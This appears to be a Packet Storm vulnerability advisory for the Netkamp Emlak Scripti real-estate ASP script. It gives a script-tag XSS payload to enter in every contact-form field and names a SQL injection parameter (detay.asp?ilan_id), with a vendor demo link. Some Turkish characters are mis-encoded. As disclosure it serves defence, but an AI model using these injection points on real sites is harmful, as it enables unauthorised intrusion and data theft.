Netkamp Emlak Scripti is susceptible to a SQL injection vulnerability.
479f21229fd30636abe00776856203c4Netkamp Emlak Scripti XSS & Sql Ýnjections Vulnerability
#Software: Netkamp Emlak Scripti
#download: not free(350 YTL) sale: http://www.netkamp.com/net_emlak.asp
#demo: http://netemlak.netkamp.com/
#Found By: GeFORC3 ( G3 )
#Exploit & example :
-----------------------------------------------------------------------
#XSS:
http://www.site.com/script_path/iletisim.asp
write to xss code in script's tex box
expample:
Ýletiþim Formu(contact form)
Adýnýz: "><script>alert("G3");</script>
Soyadýnýz: "><script>alert("G3");</script>
E-Mail: "><script>alert("G3");</script>
Konu: "><script>alert("G3");</script>
Mesajýnýz: "><script>alert("G3");</script>
Press to "gönder"(send) button.
This xss works on "Netkamp Emlak Scripti" script's contact page
-----------------------------------------------------------------------
#Sql Ýnjections
http://www.site.com.com/script_path/detay.asp?ilan_id=[SQL]
-----------------------------------------------------
WwW.GeFORC3.ORG | WwW.HeykirBlog.Org | WwW.NetKaBus.CoM
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!